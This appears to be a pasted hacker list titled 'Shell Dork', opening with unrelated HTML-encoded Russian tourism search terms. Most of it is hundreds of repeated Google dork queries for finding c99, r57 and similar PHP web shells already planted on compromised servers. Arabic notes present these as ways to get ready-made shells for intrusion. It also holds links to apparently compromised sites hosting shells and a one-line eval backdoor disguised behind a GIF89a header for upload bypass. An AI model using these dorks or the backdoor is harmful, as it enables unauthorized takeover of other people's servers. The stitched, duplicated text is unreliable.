  547. &#1082;&#1080;&#1088;&#1075;&#1080;&#1079;&#1080;&#1103; &#1090;&#1077;&#1087;&#1083;&#1099;&#1077; &#1082;&#1083;&#1102;&#1095;&#1080;
  548. &#1082;&#1086;&#1085;&#1099;&#1077; &#1090;&#1091;&#1088;&#1099;
  549. &#1083;&#1099;&#1078;&#1085;&#1099;&#1077; &#1082;&#1088;&#1077;&#1087;&#1083;&#1077;&#1085;&#1080;&#1103; &#1076;&#1083;&#1103; &#1079;&#1080;&#1084;&#1085;&#1080;&#1093; &#1087;&#1086;&#1093;&#1086;&#1076;&#1086;&#1074;
  550. &#1086;&#1076;&#1077;&#1078;&#1076;&#1072; &#1076;&#1083;&#1103; &#1074;&#1077;&#1083;&#1086;&#1090;&#1091;&#1088;&#1080;&#1079;&#1084;&#1072;
  551. &#1086;&#1089;&#1090;&#1088;&#1086;&#1074;
  552. &#1087;&#1077;&#1096;&#1080;&#1077; &#1090;&#1091;&#1088;&#1099; &#1087;&#1086; &#1075;&#1086;&#1088;&#1085;&#1086;&#1084;&#1091; &#1072;&#1083;&#1090;&#1072;&#1102; &#1087;&#1086;&#1087;&#1091;&#1090;&#1095;&#1080;&#1082;&#1080;
  553. &#1087;&#1086;&#1080;&#1089;&#1082; &#1087;&#1086;&#1087;&#1091;&#1090;&#1095;&#1080;&#1082;&#1080; &#1085;&#1072; &#1072;&#1083;&#1090;&#1072;&#1081; &#1075;&#1086;&#1088;&#1085;&#1099;&#1081; 2008
  554. &#1087;&#1086;&#1087;&#1091;&#1090;&#1095;&#1080;&#1082; &#1080; &#1085;&#1072; &#1072;&#1083;&#1090;&#1072;&#1081;
  555. &#1087;&#1086;&#1093;&#1086;&#1076; &#1040;&#1083;&#1090;&#1072;&#1081;
  556. &#1087;&#1086;&#1093;&#1086;&#1076; &#1085;&#1072; &#1040;&#1083;&#1090;&#1072;&#1081;
  557. &#1087;&#1086;&#1093;&#1086;&#1076; &#1085;&#1072; &#1072;&#1083;&#1090;&#1072;&#1081;
  558. &#1087;&#1088;&#1086;&#1089;&#1090;&#1099;&#1077; &#1080;&#1079;&#1086;&#1073;&#1088;&#1077;&#1090;&#1077;&#1085;&#1080;&#1103;
  559. &#1089;. &#1090;&#1086;&#1087;&#1086;&#1083;&#1100;&#1085;&#1086;&#1077; &#1091;&#1089;&#1090;&#1100;-&#1082;&#1072;&#1085;
  560. &#1089;&#1072;&#1084;&#1099;&#1077; &#1082;&#1088;&#1072;&#1089;&#1080;&#1074;&#1099;&#1077; &#1084;&#1077;&#1089;&#1090;&#1072; &#1074; &#1061;&#1072;&#1082;&#1072;&#1089;&#1080;&#1080;
  561. &#1089;&#1085;&#1072;&#1088;&#1103;&#1078;&#1077;&#1085;&#1080;&#1077; &#1076;&#1083;&#1103; &#1074;&#1077;&#1083;&#1086;&#1087;&#1086;&#1093;&#1086;&#1076;&#1072;
  562. &#1089;&#1087;&#1080;&#1089;&#1086;&#1082; &#1089;&#1085;&#1072;&#1088;&#1103;&#1078;&#1077;&#1085;&#1080;&#1103; &#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  563. &#1089;&#1091;&#1083;&#1086;&#1077;&#1074;
  564. &#1090;&#1091;&#1088; &#1089; &#1059;&#1089;&#1090;&#1100; &#1050;&#1072;&#1085;&#1072; &#1076;&#1086; &#1052;&#1091;&#1083;&#1100;&#1090;&#1080;&#1085;&#1089;&#1082;&#1080;&#1093; &#1086;&#1079;&#1077;&#1088;
  565. &#1090;&#1091;&#1088; &#1089;. &#1059;&#1089;&#1090;&#1100; -&#1050;&#1086;&#1082;&#1089; -&#1052;&#1091;&#1083;&#1100;&#1090;&#1080;&#1085;&#1089;&#1082;&#1080;&#1077; &#1086;&#1079;&#1077;&#1088;&#1072;
  566. &#1090;&#1091;&#1088;&#1080;&#1079;&#1084; &#1102;&#1084;&#1086;&#1088; &#1087;&#1086;&#1093;&#1086;&#1076; &#1088;&#1102;&#1082;&#1079;&#1072;&#1082; &#1089;&#1087;&#1072;&#1083;&#1100;&#1085;&#1080;&#1082;
  567. &#1095;&#1090;&#1086; &#1085;&#1077;&#1086;&#1073;&#1093;&#1086;&#1076;&#1080;&#1084;&#1086; &#1074;&#1079;&#1103;&#1090;&#1100; &#1089; &#1089;&#1086;&#1073;&#1086;&#1081; &#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  568. &#1095;&#1090;&#1086; &#1085;&#1091;&#1078;&#1085;&#1086; &#1074;&#1079;&#1103;&#1090;&#1100; &#1089; &#1089;&#1086;&#1073;&#1086;&#1081; &#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  569. &#1101;&#1088;&#1086;&#1090;&#1080;&#1082;&#1072;
  570. &#1102;&#1084;&#1086;&#1088; &#1089;&#1087;&#1083;&#1072;&#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  571.  
  572.  
  573.  
  574.  
  575.  
  576.  
  577.  
  578.  
  579.  
  580. ===============================
  581.  
  582.  
  583.  
  584.  
  585.  
  586.  
  587.  
  588.  
  589.  
  590. ================================
  591.  
  592.  
  593.   inurl:c99.php
  594.   inurl:c99.php uid=0(root)
  595.   root c99.php
  596.   "Captain Crunch Security Team" inurl:c99
  597.   download c99.php
  598.   download c99.php
  599.   download c99.php
  600.   inurl:c99.php
  601.   inurl:c99.php
  602.   allinurl: c99.php
  603.   inurl:c99.php
  604.   allinurl: c99.php
  605.   inurl: /c99.php"
  606.   allinurl: c99.php
  607.   inurl:c99.php
  608.   inurl:"c99.php" c99shell
  609.  
  610. ====================================================
  611.  
  612. safe-mode: off (not secure) drwxrwxrwx c99shell
  613. inurl:c99.php
  614. inurl:c99.php uid=0(root)
  615. root c99.php
  616. "Captain Crunch Security Team" inurl:c99
  617. download c99.php
  618. download c99.php
  619. download c99.php
  620. inurl:c99.php
  621. inurl:c99.php
  622. allinurl: c99.php
  623. inurl:c99.php
  624. allinurl: c99.php
  625. inurl:"/c99.php"
  626. allinurl: c99.php
  627. inurl:c99.php
  628. inurl:"c99.php" c99shell
  629. inurl:c99.php uid=0(root)
  630. c99shell powered by admin
  631. c99shell powered by admin
  632. inurl:"/c99.php"
  633. inurl:c99.php
  634. inurl:c99.php
  635. inurl:c99.php
  636. c99 shell v.1.0 (roots)
  637. inurl:c99.php
  638. allintitle: "c99shell"
  639. inurl:"c99.php
  640. inurl:"c99.php
  641. allinurl: "c99.php"
  642. inurl:c99.php
  643. intitle:C99Shell v. 1.0 pre-release +uname
  644. intitle:C99Shell v. 1.0 pre-release +uname
  645. allinurl: "c99.php"
  646. inurl:c99.php
  647. inurl:"c99.php"
  648. inurl:"c99.php"
  649. inurl:c99.php
  650. inurl:c99.php
  651. inurl:c99.php
  652. inurl:c99.php
  653. inurl:"c99.php" c99shell
  654. inurl:c99.php
  655. inurl:"c99.php"
  656. allinurl:c99.php
  657. inurl:"/c99.php
  658. inurl:c99.php?
  659. inurl:/c99.php+uname
  660. allinurl:"c99.php"
  661. allinurl:c99.php
  662. inurl:"c99.php"
  663. inurl:"c99.php"
  664. allinurl:c99.php
  665. allinurl:c99.php?
  666. allinurl:c99.php?
  667. allinurl:c99.php?
  668. "inurl:c99..php"
  669. allinurl:c99.php
  670. c99shell [file on secure ok ]?
  671. inurl:c99.php
  672. inurl:c99.php
  673. inurl:c99.php
  674. inurl:c99.php
  675. inurl:c99.php
  676. inurl:c99.php
  677. inurl:c99.php
  678. inurl:c99.php
  679. powered by Captain Crunch Security Team
  680. allinurl:c99.php
  681. "c99.php" filetype:php
  682. allinurl:c99.php
  683. inurl:c99.php
  684. allinurl:.c99.php
  685. "inurl:c99.php"
  686. c99. PHP-code Feedback Self remove
  687. allinurl:c99.php
  688. download c99.php
  689. allinurl:c99.php
  690. inurl:c99.php
  691. allinurl: "c99.php"
  692. allinurl:c99.php
  693. allinurl:c99.php
  694. c99shell
  695. inurl:c99.php
  696. inurl:c99.php
  697. intitle:C99Shell v. 1.0 pre-release +uname
  698. allinurl:"c99.php"
  699. inurl:c99.php
  700. inurl:c99.php
  701. inurl:c99.php
  702. inurl:c99.php
  703. safe-mode: off (not secure) drwxrwxrwx c99shell
  704. inurl:/c99.php
  705. inurl:"c99.php"
  706. inurl:c99.php
  707. inurl:c99.php
  708. c99.php download
  709. inurl:c99.php
  710. inurl:"c99.php"
  711. inurl:/c99.php
  712. inurl:"c99.php?"
  713. inurl:c99.php
  714. inurl:c99.php
  715. files/c99.php
  716. c99shell filetype:php -echo
  717. c99shell powered by admin
  718. inurl:c99.php
  719. inurl:c99.php
  720. inurl:"c99.php"
  721. inurl:c99.php uid=0(root)
  722. allinurl:c99.php
  723. inurl:"c99.php"
  724. inurl:"c99.php"
  725. inurl:"/c99.php" intitle:"C99shell"
  726. inurl:"/c99.php" intitle:"C99shell"
  727. inurl:"/c99.php" intitle:"C99shell"
  728. C99Shell v. 1.0 pre-release build #5
  729. inurl:c99.php
  730. inurl:c99.php
  731. --[ c99shell v. 1.0 pre-release build #16
  732. c99shell linux infong
  733. c99shell linux infong
  734. C99Shell v. 1.0 pre-release build
  735. !C99Shell v. 1.0 beta!
  736. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  737. !c99shell v. 1+Safe-mode: OFF (not secure)
  738. "C99Shell v. 1.0 pre-release build "
  739. intitle:c99shell +filetype:php
  740. inurl:c99.php
  741. intitle:C99Shell v. 1.0 pre-release +uname
  742. "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  743. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  744. intitle:!C99Shell v. 1.0 pre-release build #16! root
  745. !C99Shell v. 1.0 pre-release build #5!
  746. inurl:"c99.php"
  747. C99Shell v. 1.0 pre-release build #16!
  748. c99shell v. 1.0 pre-release build #16
  749. intitle:c99shell intext:uname
  750. allintext:C99Shell v. 1.0 pre-release build #12
  751. c99shell v. 1.0 pre-release build #16
  752. --[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
  753. allinurl: "c99.php"
  754. allinurl: "c99.php"
  755. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  756. "c99shell v 1.0"
  757. ftp apache inurl:c99.php
  758. c99shell+v.+1.0 16
  759. C99Shell v. 1.0 pre-release build #16 download
  760. intitle:c99shell "Software: Apache"
  761. allinurl: c99.php
  762. allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  763. powered by Captain Crunch Security Team
  764. powered by Captain Crunch Security Team
  765. !C99Shell v. 1.0 pre-release build #5!
  766. c99shell v. 1.0 release security
  767. c99shell v. 1.0 pre-release build
  768. inurl:c99.php
  769. c99shell [file on secure ok ]?
  770. C99Shell v. 1.3
  771. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  772. inurl:c99.php uid=0(root)
  773. powered by Captain Crunch Security Team
  774. C99Shell v. 1.0 pre-release build #16
  775. c99shell[on file]ok
  776. c99shell[file on ]ok
  777. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  778. inurl:c99.php
  779. "C99Shell v. 1.0 pre"
  780. =C99Shell v. 1.0 pre-release
  781. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  782. c99shell v. pre-release build
  783. inurl:c99.php c99 shell
  784. inurl:c99.php c99 shell
  785. powered by Captain Crunch Security Team
  786. inurl:c99.php
  787. inurl:c99.php
  788. !C99Shell v. 1.0 pre-release build #5!
  789. intitle:"c99shell" filetype:php root
  790. intitle:"c99shell" Linux infong 2.4
  791. C99Shell v. 1.0 beta !
  792. C99Shell v. 1.0 pre-release build #
  793. inurl:"c99.php"
  794. allintext:C99Shell v. 1.0 pre-release build #12
  795. "C99Shell v. 1.0 pre"
  796. powered by Captain Crunch Security Team
  797. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  798. inurl:/c99.php?
  799. allinurl:c99.php
  800. intitle:C99Shell pre-release
  801. inurl:"c99.php"
  802. powered by Captain Crunch Security Team
  803. inurl:c99.php
  804. C99Shell v. 1.0 pre-release build #16!
  805. allinurl:c99.php
  806. C99Shell v. 1.0 pre-release build #16 administrator
  807. intitle:c99shell filetype:php
  808. powered by Captain Crunch Security Team
  809. powered by Captain Crunch Security Team
  810. C99Shell v. 1.0 pre-release build #12
  811. c99shell v.1.0
  812. allinurl:c99.php
  813. "c99shell v. 1.0 pre-release build"
  814. inurl:"c99.php" filetype:php
  815. "c99shell v. 1.0 "
  816. ok c99.php
  817. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  818. c99shell v. 1.0 pre-release build #16 |
  819. !C99Shell v. 1.0 pre-release build #5!
  820. !C99Shell v. 1.0 pre-release build #5!
  821. allinurl:/c99.php
  822. powered by Captain Crunch Security Team
  823. inurl:c99.php
  824. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  825. inurl:c99.php
  826. powered by Captain Crunch Security Team
  827. inurl:c99.php
  828. C99Shell v. 1.0 pre-release
  829. inurl:c99.php
  830. inurl:c99.php ext:php
  831. inurl:"c99.php"
  832. allinurl:"c99.php"
  833. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  834. powered by Captain Crunch Security Team
  835. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  836. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
  837. C99Shell v. 1.0 pre-release build #16 software apache
  838. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  839. "c99shell v 1.0"
  840. inurl:"c99.php"
  841. allintitle: C99shell filetype:php
  842. C99Shell v. 1.0 pre-release build #16!
  843. "c99shell v. 1.0 pre-release"
  844. c99shell v. 1.0 pre-release build #5
  845. allinurl:"c99.php" filetype:php
  846. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  847. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  848. !C99Shell v. 1.0 pre-release build #16!
  849. inurl:c99.php
  850. intitle:C99Shell v. 1.0 pre-release +uname
  851. inurl:c99.php
  852. c99shell v. 1.0
  853. allinurl: c99.php
  854. --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  855. inurl:"/c99.php"
  856. c99shell +uname
  857. c99shell php + uname
  858. c99shell php + uname
  859. --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  860. allinurl:c99.php
  861. !C99Shell v. 1.0 pre-release build #5!
  862. C99Shell v.1.0 pre-release
  863. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  864. inurl:c99.php
  865. intitle:c99shell filetype:php
  866. "Encoder Tools Proc. FTP brute"
  867. "c99" filetype:php intext:"Safe-Mode: OFF"
  868. c99shell v. 1.0 pre
  869. inurl:c99.php
  870. intitle:c99shell uname -bbpress
  871. intitle:"index.of" c99.php
  872. inurl:admin/files/
  873. intitle:"index of /" "c99.php"
  874. intitle:"index of" intext:c99.php
  875. intitle:index.of c99.php
  876. intitle:"index of" + c99.php
  877. intitle:index/of file c99.php
  878. intitle:index/of file c99.php
  879. index of /admin/files/
  880. intitle:"Index of/"+c99.php
  881. c99.php "intitle:Index of "
  882. c99.php "intitle:Index of "
  883. c99.php "intitle:Index of "
  884. intitle:index.of c99.php
  885. img/c99.php
  886. intitle:index.of c99.php
  887. img.c99.php
  888. intitle:"Index of/"+c99.php
  889. "index of /" c99.php
  890. c99.php
  891. intitle:"Index of" c99.php
  892. "index of" c99.php
  893. "Index of/"+c99.php
  894.  
  895. ===========================================================
  896.  
  897. &#1575;&#1581;&#1590;&#1575;&#1585; &#1588;&#1604;&#1575;&#1578; &#1580;&#1575;&#1607;&#1586;&#1577; &#1605;&#1585;&#1601;&#1608;&#1593;&#1577; &#1576;&#1589;&#1610;&#1594;&#1577; &#1578;&#1603;&#1587;&#1578; &#1604;&#1578;&#1587;&#1578;&#1582;&#1583;&#1605;&#1607;&#1575; &#1601;&#1609; &#1579;&#1594;&#1585;&#1575;&#1578; &#1575;&#1604;&#1601;&#1575;&#1610;&#1604; &#1575;&#1606;&#1603;&#1604;&#1608;&#1583;
  898. &#1575;&#1603;&#1578;&#1576; &#1601;&#1609; &#1575;&#1609; &#1580;&#1608;&#1580;&#1604; &#1575;&#1604;&#1575;&#1578;&#1609;:
  899.  
  900. inurl:c99.txt?
  901. &#1575;&#1608;
  902. inurl:r57.txt?
  903. &#1575;&#1608;
  904. inurl:sniper-sa.txt?
  905.  
  906. =====
  907.  
  908. &#1604;&#1575;&#1581;&#1590;&#1575;&#1585; &#1588;&#1604;&#1575;&#1578; &#1580;&#1575;&#1607;&#1586;&#1577; &#1604;&#1604;&#1575;&#1582;&#1578;&#1585;&#1575;&#1602;
  909. &#1575;&#1603;&#1578;&#1576; &#1601;&#1609; &#1580;&#1608;&#1580;&#1604;
  910.  
  911. inurl:c99+uname
  912.  
  913. inurl:r57+uname
  914.  
  915. inurl:sniper-sa+uname
  916.  
  917.  
  918. ===========================
  919.  
  920.  
  921. c99shell
  922.  
  923. C99SHELL
  924.  
  925. c99shell /=(5)
  926.  
  927. - c99shell [ ok ]
  928.  
  929. --[ c99shell modded by . 2 ]--
  930.  
  931.  
  932. C99Shell
  933.  
  934. c99shell modded by
  935.  
  936. c99shell modded by w4ck1ng
  937.  
  938. c99shell modded by w4ck1ng. | w4ck1ng-shell
  939.  
  940. c99shell=[ok]
  941.  
  942. tr index php c99shell
  943.  
  944. w4ck1ng c99shell
  945.  
  946. ================================================
  947. http://w7ed.by.ru/c99.txt
  948.  
  949.  
  950. ===============================================
  951.  
  952.  
  953. uid=99(nobody) gid=99(nobody) groups=99(nobody). Safe-mode: OFF (not secure)
  954.  
  955. =============================================
  956.  
  957.  
  958.  
  959. RAR!
  960. Gif89a
  961. <?php @eval($_POST[cmd])?>
  962.  
  963. ---------
  964.  
  965. gif89a.php
  966.  
  967. ---------
  968.  
  969. :: Create folder :: Create file :: Read file if safe mode is Off ::"; if($os=="unix"){ print "PS table ::"; }
  970.  
  971. ========================================================
  972.  
  973.  
  974. Safe Mode OFF (?)
  975.  
  976. http://aquafitness.gr/~willboar/c100.php
  977.  
  978. http://www.iyi.gen.tr/admin/c99 ...
  979.  
  980. http://www.google.com.mx/search?
  981. hl=es&q=inurl:r57.php&start=80&sa=N jajaja :o
  982.  
  983. ============================================================
  984.  
  985. [HIDE] inurl:c99.php
  986. inurl:c99.php uid=0(root)
  987. root c99.php
  988. "Captain Crunch Security Team" inurl:c99
  989. download c99.php
  990. download c99.php
  991. download c99.php
  992. inurl:c99.php
  993. inurl:c99.php
  994. allinurl: c99.php
  995. inurl:c99.php
  996. allinurl: c99.php
  997. inurl:"/c99.php"
  998. allinurl: c99.php
  999. inurl:c99.php
  1000. inurl:"c99.php" c99shell
  1001. inurl:c99.php uid=0(root)
  1002. c99shell powered by admin
  1003. c99shell powered by admin
  1004. inurl:"/c99.php"
  1005. inurl:c99.php
  1006. inurl:c99.php
  1007. inurl:c99.php
  1008. c99 shell v.1.0 (roots)
  1009. inurl:c99.php
  1010. allintitle: "c99shell"
  1011. inurl:"c99.php
  1012. inurl:"c99.php
  1013. allinurl: "c99.php"
  1014. inurl:c99.php
  1015. intitle:C99Shell v. 1.0 pre-release +uname
  1016. intitle:C99Shell v. 1.0 pre-release +uname
  1017. allinurl: "c99.php"
  1018. inurl:c99.php
  1019. inurl:"c99.php"
  1020. inurl:"c99.php"
  1021. inurl:c99.php
  1022. inurl:c99.php
  1023. inurl:c99.php
  1024. inurl:c99.php
  1025. inurl:"c99.php" c99shell
  1026. inurl:c99.php
  1027. inurl:"c99.php"
  1028. allinurl:c99.php
  1029. inurl:"/c99.php
  1030. inurl:c99.php?
  1031. inurl:/c99.php+uname
  1032. allinurl:"c99.php"
  1033. allinurl:c99.php
  1034. inurl:"c99.php"
  1035. inurl:"c99.php"
  1036. allinurl:c99.php
  1037. allinurl:c99.php?
  1038. allinurl:c99.php?
  1039. allinurl:c99.php?
  1040. "inurl:c99..php"
  1041. allinurl:c99.php
  1042. c99shell [file on secure ok ]?
  1043. inurl:c99.php
  1044. inurl:c99.php
  1045. inurl:c99.php
  1046. inurl:c99.php
  1047. inurl:c99.php
  1048. inurl:c99.php
  1049. inurl:c99.php
  1050. inurl:c99.php
  1051. powered by Captain Crunch Security Team
  1052. allinurl:c99.php
  1053. "c99.php" filetype:php
  1054. allinurl:c99.php
  1055. inurl:c99.php
  1056. allinurl:.c99.php
  1057. "inurl:c99.php"
  1058. c99. PHP-code Feedback Self remove
  1059. allinurl:c99.php
  1060. download c99.php
  1061. allinurl:c99.php
  1062. inurl:c99.php
  1063. allinurl: "c99.php"
  1064. allinurl:c99.php
  1065. allinurl:c99.php
  1066. c99shell
  1067. inurl:c99.php
  1068. inurl:c99.php
  1069. intitle:C99Shell v. 1.0 pre-release +uname
  1070. allinurl:"c99.php"
  1071. inurl:c99.php
  1072. inurl:c99.php
  1073. inurl:c99.php
  1074. inurl:c99.php
  1075. safe-mode: off (not secure) drwxrwxrwx c99shell
  1076. inurl:/c99.php
  1077. inurl:"c99.php"
  1078. inurl:c99.php
  1079. inurl:c99.php
  1080. c99.php download
  1081. inurl:c99.php
  1082. inurl:"c99.php"
  1083. inurl:/c99.php
  1084. inurl:"c99.php?"
  1085. inurl:c99.php
  1086. inurl:c99.php
  1087. files/c99.php
  1088. c99shell filetype:php -echo
  1089. c99shell powered by admin
  1090. inurl:c99.php
  1091. inurl:c99.php
  1092. inurl:"c99.php"
  1093. inurl:c99.php uid=0(root)
  1094. allinurl:c99.php
  1095. inurl:"c99.php"
  1096. inurl:"c99.php"
  1097. inurl:"/c99.php" intitle:"C99shell"
  1098. inurl:"/c99.php" intitle:"C99shell"
  1099. inurl:"/c99.php" intitle:"C99shell"
  1100. C99Shell v. 1.0 pre-release build #5
  1101. inurl:c99.php
  1102. inurl:c99.php
  1103. --[ c99shell v. 1.0 pre-release build #16
  1104. c99shell linux infong
  1105. c99shell linux infong
  1106. C99Shell v. 1.0 pre-release build
  1107. !C99Shell v. 1.0 beta!
  1108. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1109. !c99shell v. 1+Safe-mode: OFF (not secure)
  1110. "C99Shell v. 1.0 pre-release build "
  1111. intitle:c99shell +filetype:php
  1112. inurl:c99.php
  1113. intitle:C99Shell v. 1.0 pre-release +uname
  1114. "Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1115. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1116. intitle:!C99Shell v. 1.0 pre-release build #16! root
  1117. !C99Shell v. 1.0 pre-release build #5!
  1118. inurl:"c99.php"
  1119. C99Shell v. 1.0 pre-release build #16!
  1120. c99shell v. 1.0 pre-release build #16
  1121. intitle:c99shell intext:uname
  1122. allintext:C99Shell v. 1.0 pre-release build #12
  1123. c99shell v. 1.0 pre-release build #16
  1124. --[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
  1125. allinurl: "c99.php"
  1126. allinurl: "c99.php"
  1127. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1128. "c99shell v 1.0"
  1129. ftp apache inurl:c99.php
  1130. c99shell+v.+1.0 16
  1131. C99Shell v. 1.0 pre-release build #16 download
  1132. intitle:c99shell "Software: Apache"
  1133. allinurl: c99.php
  1134. allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1135. powered by Captain Crunch Security Team
  1136. powered by Captain Crunch Security Team
  1137. !C99Shell v. 1.0 pre-release build #5!
  1138. c99shell v. 1.0 release security
  1139. c99shell v. 1.0 pre-release build
  1140. inurl:c99.php
  1141. c99shell [file on secure ok ]?
  1142. C99Shell v. 1.3
  1143. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1144. inurl:c99.php uid=0(root)
  1145. powered by Captain Crunch Security Team
  1146. C99Shell v. 1.0 pre-release build #16
  1147. c99shell[on file]ok
  1148. c99shell[file on ]ok
  1149. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1150. inurl:c99.php
  1151. "C99Shell v. 1.0 pre"
  1152. =C99Shell v. 1.0 pre-release
  1153. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1154. c99shell v. pre-release build
  1155. inurl:c99.php c99 shell
  1156. inurl:c99.php c99 shell
  1157. powered by Captain Crunch Security Team
  1158. inurl:c99.php
  1159. inurl:c99.php
  1160. !C99Shell v. 1.0 pre-release build #5!
  1161. intitle:"c99shell" filetype:php root
  1162. intitle:"c99shell" Linux infong 2.4
  1163. C99Shell v. 1.0 beta !
  1164. C99Shell v. 1.0 pre-release build #
  1165. inurl:"c99.php"
  1166. allintext:C99Shell v. 1.0 pre-release build #12
  1167. "C99Shell v. 1.0 pre"
  1168. powered by Captain Crunch Security Team
  1169. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1170. inurl:/c99.php?
  1171. allinurl:c99.php
  1172. intitle:C99Shell pre-release
  1173. inurl:"c99.php"
  1174. powered by Captain Crunch Security Team
  1175. inurl:c99.php
  1176. C99Shell v. 1.0 pre-release build #16!
  1177. allinurl:c99.php
  1178. C99Shell v. 1.0 pre-release build #16 administrator
  1179. intitle:c99shell filetype:php
  1180. powered by Captain Crunch Security Team
  1181. powered by Captain Crunch Security Team
  1182. C99Shell v. 1.0 pre-release build #12
  1183. c99shell v.1.0
  1184. allinurl:c99.php
  1185. "c99shell v. 1.0 pre-release build"
  1186. inurl:"c99.php" filetype:php
  1187. "c99shell v. 1.0 "
  1188. ok c99.php
  1189. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1190. c99shell v. 1.0 pre-release build #16 |
  1191. !C99Shell v. 1.0 pre-release build #5!
  1192. !C99Shell v. 1.0 pre-release build #5!
  1193. allinurl:/c99.php
  1194. powered by Captain Crunch Security Team
  1195. inurl:c99.php
  1196. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1197. inurl:c99.php
  1198. powered by Captain Crunch Security Team
  1199. inurl:c99.php
  1200. C99Shell v. 1.0 pre-release
  1201. inurl:c99.php
  1202. inurl:c99.php ext:php
  1203. inurl:"c99.php"
  1204. allinurl:"c99.php"
  1205. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1206. powered by Captain Crunch Security Team
  1207. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1208. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
  1209. C99Shell v. 1.0 pre-release build #16 software apache
  1210. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1211. "c99shell v 1.0"
  1212. inurl:"c99.php"
  1213. allintitle: C99shell filetype:php
  1214. C99Shell v. 1.0 pre-release build #16!
  1215. "c99shell v. 1.0 pre-release"
  1216. c99shell v. 1.0 pre-release build #5
  1217. allinurl:"c99.php" filetype:php
  1218. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1219. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1220. !C99Shell v. 1.0 pre-release build #16!
  1221. inurl:c99.php
  1222. intitle:C99Shell v. 1.0 pre-release +uname
  1223. inurl:c99.php
  1224. c99shell v. 1.0
  1225. allinurl: c99.php
  1226. --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  1227. inurl:"/c99.php"
  1228. c99shell +uname
  1229. c99shell php + uname
  1230. c99shell php + uname
  1231. --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
  1232. allinurl:c99.php
  1233. !C99Shell v. 1.0 pre-release build #5!
  1234. C99Shell v.1.0 pre-release
  1235. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  1236. inurl:c99.php
  1237. intitle:c99shell filetype:php
  1238. "Encoder Tools Proc. FTP brute"
  1239. "c99" filetype:php intext:"Safe-Mode: OFF"
  1240. c99shell v. 1.0 pre
  1241. inurl:c99.php
  1242. intitle:c99shell uname -bbpress
  1243. intitle:"index.of" c99.php
  1244. inurl:admin/files/
  1245. intitle:"index of /" "c99.php"
  1246. intitle:"index of" intext:c99.php
  1247. intitle:index.of c99.php
  1248. intitle:"index of" + c99.php
  1249. intitle:index/of file c99.php
  1250. intitle:index/of file c99.php
  1251. index of /admin/files/
  1252. intitle:"Index of/"+c99.php
  1253. c99.php "intitle:Index of "
  1254. c99.php "intitle:Index of "
  1255. c99.php "intitle:Index of "
  1256. intitle:index.of c99.php
  1257. img/c99.php
  1258. intitle:index.of c99.php
  1259. img.c99.php
  1260. intitle:"Index of/"+c99.php
  1261. "index of /" c99.php
  1262. c99.php
  1263. intitle:"Index of" c99.php
  1264. "index of" c99.php
  1265. "Index of/"+c99.php[/hide]
  1266.  
  1267.  
  1268. Shell Dork
  1269.  
  1270. =============================================================
  1271.  
  1272.  
  1273.  
  1274. Shell Dork
  1275.  
